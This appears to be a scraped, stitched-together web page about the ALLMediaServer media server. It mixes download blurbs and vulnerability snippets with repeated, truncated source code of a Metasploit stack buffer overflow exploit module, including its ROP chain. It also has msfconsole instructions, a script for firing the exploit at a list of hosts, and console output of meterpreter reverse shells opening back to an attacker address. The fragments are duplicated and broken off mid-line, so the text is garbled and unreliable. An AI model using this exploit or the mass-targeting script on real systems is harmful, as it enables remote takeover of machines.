Allmediaserver
Author: s | 2025-04-23
ALLMediaServer, free download. ALLMediaServer 1.6: ALLMediaServer Review ALLMediaServer by ALLCinema, Inc. ALLMediaServer 1.6 ALLMediaServer 0.95 and prior: Vulnerability Description: A buffer overflow vulnerability exists in ALLMediaServer. Successful exploitation of this
Download ALLMediaServer Free Trial - ALLMediaServer
ALLMediaServer 0.8 - Remote Buffer Overflow (Metasploit) ### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# 'msf/core'class Metasploit3 'ALLMediaServer 0.8 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. }, 'License' => MSF_LICENSE, 'Author' => [ 'motaz reda ', # Original discovery 'modpr0be ', # Metasploit module 'juan vazquez' # More improvement ], 'References' => [ [ 'EDB', '19625' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "", 'Space' => 660, 'DisableNops' => true }, 'Targets' => [ [ 'ALLMediaServer 0.8 / Windows XP SP3 - English', { 'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll 'OffsetRop' => 696, 'jmp' => 264, 'Offset' => 1072 } ], [ 'ALLMediaServer 0.8 / Windows 7 SP1 - English', { 'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll 'OffsetRop' => 332, 'jmp' => 628, 'Offset' => 1072 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jul 04 2012', 'DefaultTarget' => 1)) register_options([Opt::RPORT(888)], self.class) end def junk(n=1) return [rand_text_alpha(4).unpack("L")[0]] * n end def nops(rop=false, n=1) return rop ? [0x665a0aa1] * n : [0x90909090] * n end def asm(code) Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string end def exploit #with help from mona :) rop = [ nops(true, 12), #ROP NOP 0x65f6faa7, # POP EAX # RETN 0x671ee4e0, # ptr to &VirtualProtect() 0x6ac1ccb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x667ceedf, # PUSH EAX # POP ESI # POP EDI # RETN junk, 0x65f5f09d, # POP EBP # RETN 0x65f9830d, # & call esp 0x6ac1c1d5, # POP EBX # RETN 0x00000600, # 0x00000320-> ebx 0x6672a1e2, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x665a09df, # POP ECX # RETN 0x6ad58a3d, # &Writable location 0x6ac7a771, # POP EDI # RETN nops(true), # RETN (ROP NOP) 0x6682f9f4, # POP EAX # RETN nops, # nop 0x663dcbd2 # PUSHAD # RETN ].flatten.pack("V*") connect buffer = rand_text(target['OffsetRop']) #junk buffer. ALLMediaServer, free download. ALLMediaServer 1.6: ALLMediaServer Review ALLMediaServer by ALLCinema, Inc. ALLMediaServer 1.6 ALLMediaServer 0.95 and prior: Vulnerability Description: A buffer overflow vulnerability exists in ALLMediaServer. Successful exploitation of this PlanetSofts - ALLMediaServer - ALLMediaServer is very easy - Facebook PlanetSofts Vulnerabilities and exploits of allmediaserver allmediaserver. A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and previous versions that could allow Vulnerabilities and exploits of allmediaserver allmediaserver 1.6. Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote malicious users to CVE Vendors Products Updated CVSS v2 CVSS v3; CVE- : 1 Allmediaserver: 1 Allmediaserver: : 10.0 HIGH: 9.8 CRITICAL: Mediaserver.exe in ALLMediaServer There is nothing complicated about installing ALLMediaServer on a Windows PC. ALLMediaServer has a dark-themed interface that is good looking and easy to use. The Support section on ALLMediaServer.org nicely presents ALLMediaServer s interface; it also presents useful info on how to use the application. ALLMediaServer is free software. Cons Resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)[*] Trying against 192.168.1.80RHOST => 192.168.1.80DisablePayloadHandler => truePAYLOAD => windows/meterpreter/reverse_tcpLHOST => 192.168.1.199[*] 192.168.1.80:445 - Automatically detecting the target...[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...[*] Sending stage (957999 bytes) to 192.168.1.80[*] Trying against 192.168.1.109RHOST => 192.168.1.109DisablePayloadHandler => truePAYLOAD => windows/meterpreter/reverse_tcpLHOST => 192.168.1.199[*] 192.168.1.109:445 - Automatically detecting the target...[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600[*] Sending stage (957999 bytes) to 192.168.1.109[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600Required OptionsRHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:'Go back to menu.Msfconsole UsageHere is how the windows/misc/allmediaserver_bof exploit module looks in the msfconsole:msf6 > use exploit/windows/misc/allmediaserver_bof[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/misc/allmediaserver_bof) > show info Name: ALLMediaServer 0.8 Buffer Overflow Module: exploit/windows/misc/allmediaserver_bof Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2012-07-04Provided by: motaz reda [email protected]> modpr0be [email protected]> juan vazquez [email protected]>Available targets: Id Name -- ---- 0 ALLMediaServer 0.8 / Windows XP SP3 - English 1 ALLMediaServer 0.8 / Windows 7 SP1 - EnglishCheck supported: NoBasic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 888 yes The target port (TCP)Payload information: Space: 660 Avoid: 0 charactersDescription: This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.References: OSVDB (83889) OptionsThis is a complete list of options available in the windows/misc/allmediaserver_bof exploit:msf6 exploit(windows/misc/allmediaserver_bof) > show optionsModule options (exploit/windows/misc/allmediaserver_bof): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 888 yes The target portComments
ALLMediaServer 0.8 - Remote Buffer Overflow (Metasploit) ### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# 'msf/core'class Metasploit3 'ALLMediaServer 0.8 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. }, 'License' => MSF_LICENSE, 'Author' => [ 'motaz reda ', # Original discovery 'modpr0be ', # Metasploit module 'juan vazquez' # More improvement ], 'References' => [ [ 'EDB', '19625' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "", 'Space' => 660, 'DisableNops' => true }, 'Targets' => [ [ 'ALLMediaServer 0.8 / Windows XP SP3 - English', { 'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll 'OffsetRop' => 696, 'jmp' => 264, 'Offset' => 1072 } ], [ 'ALLMediaServer 0.8 / Windows 7 SP1 - English', { 'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll 'OffsetRop' => 332, 'jmp' => 628, 'Offset' => 1072 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jul 04 2012', 'DefaultTarget' => 1)) register_options([Opt::RPORT(888)], self.class) end def junk(n=1) return [rand_text_alpha(4).unpack("L")[0]] * n end def nops(rop=false, n=1) return rop ? [0x665a0aa1] * n : [0x90909090] * n end def asm(code) Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string end def exploit #with help from mona :) rop = [ nops(true, 12), #ROP NOP 0x65f6faa7, # POP EAX # RETN 0x671ee4e0, # ptr to &VirtualProtect() 0x6ac1ccb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x667ceedf, # PUSH EAX # POP ESI # POP EDI # RETN junk, 0x65f5f09d, # POP EBP # RETN 0x65f9830d, # & call esp 0x6ac1c1d5, # POP EBX # RETN 0x00000600, # 0x00000320-> ebx 0x6672a1e2, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x665a09df, # POP ECX # RETN 0x6ad58a3d, # &Writable location 0x6ac7a771, # POP EDI # RETN nops(true), # RETN (ROP NOP) 0x6682f9f4, # POP EAX # RETN nops, # nop 0x663dcbd2 # PUSHAD # RETN ].flatten.pack("V*") connect buffer = rand_text(target['OffsetRop']) #junk buffer
2025-04-04Resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)[*] Trying against 192.168.1.80RHOST => 192.168.1.80DisablePayloadHandler => truePAYLOAD => windows/meterpreter/reverse_tcpLHOST => 192.168.1.199[*] 192.168.1.80:445 - Automatically detecting the target...[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...[*] Sending stage (957999 bytes) to 192.168.1.80[*] Trying against 192.168.1.109RHOST => 192.168.1.109DisablePayloadHandler => truePAYLOAD => windows/meterpreter/reverse_tcpLHOST => 192.168.1.199[*] 192.168.1.109:445 - Automatically detecting the target...[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600[*] Sending stage (957999 bytes) to 192.168.1.109[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600Required OptionsRHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:'Go back to menu.Msfconsole UsageHere is how the windows/misc/allmediaserver_bof exploit module looks in the msfconsole:msf6 > use exploit/windows/misc/allmediaserver_bof[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/misc/allmediaserver_bof) > show info Name: ALLMediaServer 0.8 Buffer Overflow Module: exploit/windows/misc/allmediaserver_bof Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2012-07-04Provided by: motaz reda [email protected]> modpr0be [email protected]> juan vazquez [email protected]>Available targets: Id Name -- ---- 0 ALLMediaServer 0.8 / Windows XP SP3 - English 1 ALLMediaServer 0.8 / Windows 7 SP1 - EnglishCheck supported: NoBasic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 888 yes The target port (TCP)Payload information: Space: 660 Avoid: 0 charactersDescription: This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.References: OSVDB (83889) OptionsThis is a complete list of options available in the windows/misc/allmediaserver_bof exploit:msf6 exploit(windows/misc/allmediaserver_bof) > show optionsModule options (exploit/windows/misc/allmediaserver_bof): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 888 yes The target port
2025-03-25This page contains detailed information about how to use the exploit/windows/misc/allmediaserver_bof metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.Module OverviewModule Ranking and TraitsBasic UsageRequired OptionsMsfconsole UsageModule OptionsAdvanced OptionsExploit TargetsCompatible PayloadsEvasion OptionsRelated Pull RequestsReferencesSee AlsoAuthorsVersionModule OverviewName: ALLMediaServer 0.8 Buffer OverflowModule: exploit/windows/misc/allmediaserver_bofSource code: modules/exploits/windows/misc/allmediaserver_bof.rbDisclosure date: 2012-07-04Last modification time: 2020-10-02 17:38:06 +0000Supported architecture(s): -Supported platform(s): WindowsTarget service / protocol: -Target network port(s): 888List of CVEs: CVE-2017-17932This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.Module Ranking and TraitsModule Ranking:normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.Basic UsageUsing allmediaserver_bof against a single hostNormally, you can use exploit/windows/misc/allmediaserver_bof this way:msf > use exploit/windows/misc/allmediaserver_bofmsf exploit(allmediaserver_bof) > show targets ... a list of targets ...msf exploit(allmediaserver_bof) > set TARGET target-idmsf exploit(allmediaserver_bof) > show options ... show and set options ...msf exploit(allmediaserver_bof) > exploitUsing allmediaserver_bof against multiple hostsBut it looks like this is a remote exploit module, which means you can also engage multiple hosts.First, create a list of IPs you wish to exploit with this module. One IP per line.Second, set up a background payload listener. This payload should be the same as the one yourallmediaserver_bof will be using:Do: use exploit/multi/handlerDo: set PAYLOAD [payload]Set other options required by the payloadDo: set EXITONSESSION falseDo: run -jAt this point, you should have a payload listening.Next, create the following script. Notice you will probably need to modify the ip_list path, andpayload options accordingly:## Modify the path if necessary#ip_list = '/tmp/ip_list.txt'File.open(ip_list, 'rb').each_line do |ip| print_status("Trying against #{ip}") run_single("use exploit/windows/misc/allmediaserver_bof") run_single("set RHOST #{ip}") run_single("set DisablePayloadHandler true") # # Set a payload that's the same as the handler. # You might also need to add more run_single commands to configure other # payload options. # run_single("set PAYLOAD [payload name]") run_single("run")endNext, run the resource script in the console:msf > resource [path-to-resource-script]And finally, you should see that the exploit is trying against those hosts similar to the followingMS08-067 example:msf > resource /tmp/exploit_hosts.rc[*] Processing /tmp/exploit_hosts.rc for ERB directives.[*]
2025-04-22Use when generating the payload UUID (deterministic) PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs PingbackRetries 0 yes How many additional successful pingbacks PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks PrependMigrate false yes Spawns and runs shellcode in new process PrependMigrateProc no Process to spawn and run shellcode in ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST ReverseListenerBindAddress no The specific IP address to bind to on the local system ReverseListenerBindPort no The port to bind to on the local system if different from LPORT ReverseListenerComm no The specific communication channel to use for this listener ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure SessionRetryWait 10 no Number of seconds to wait between reconnect attempts StageEncoder no Encoder to use if EnableStageEncoding is set StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible StagerRetryCount 10 no The number of times the stager should retry if the first connect fails StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts VERBOSE false no Enable detailed status messages WORKSPACE no Specify the workspace for this moduleExploit TargetsHere is a list of targets (platforms and systems) which the windows/misc/allmediaserver_bof module can exploit:msf6 exploit(windows/misc/allmediaserver_bof) > show targetsExploit targets: Id Name -- ---- 0 ALLMediaServer 0.8 / Windows XP SP3 - English 1 ALLMediaServer 0.8 / Windows 7 SP1 - EnglishCompatible PayloadsThis is a list of possible payloads which can be delivered and executed on the target system using the windows/misc/allmediaserver_bof exploit:msf6 exploit(windows/misc/allmediaserver_bof) > show payloadsCompatible Payloads=================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 payload/generic/custom normal No Custom Payload 1 payload/generic/debug_trap normal No Generic x86 Debug Trap 2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline 3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline 4 payload/generic/tight_loop normal No Generic x86 Tight Loop 5 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager 6 payload/windows/dllinject/bind_hidden_tcp normal
2025-03-30(TCP)Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.204.3 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 1 ALLMediaServer 0.8 / Windows 7 SP1 - EnglishAdvanced OptionsHere is a complete list of advanced options supported by the windows/misc/allmediaserver_bof exploit:msf6 exploit(windows/misc/allmediaserver_bof) > show advancedModule advanced options (exploit/windows/misc/allmediaserver_bof): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection ContextInformationFile no The information file that contains context information DisablePayloadHandler false no Disable the handler code for the selected payload DynamicSehRecord false no Generate a dynamic SEH record (more stealthy) EnableContextEncoding false no Use transient context when encoding payloads Proxies no A proxy chain of format type:host:port[,type:host:port][...] SSL false no Negotiate SSL/TLS for outgoing connections SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER) SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) VERBOSE false no Enable detailed status messages WORKSPACE no Specify the workspace for this module WfsDelay 2 no Additional delay in seconds to wait for a sessionPayload advanced options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- AutoLoadStdapi true yes Automatically load the Stdapi extension AutoRunScript no A script to run automatically on session creation. AutoSystemInfo true yes Automatically capture system information on initialization. AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds EnableStageEncoding false no Encode the second stage payload EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) PayloadBindPort no Port to bind reverse tcp socket to on target system. PayloadProcessCommandLine no The displayed command line that will be used by the payload PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID PayloadUUIDSeed no A string to
2025-03-24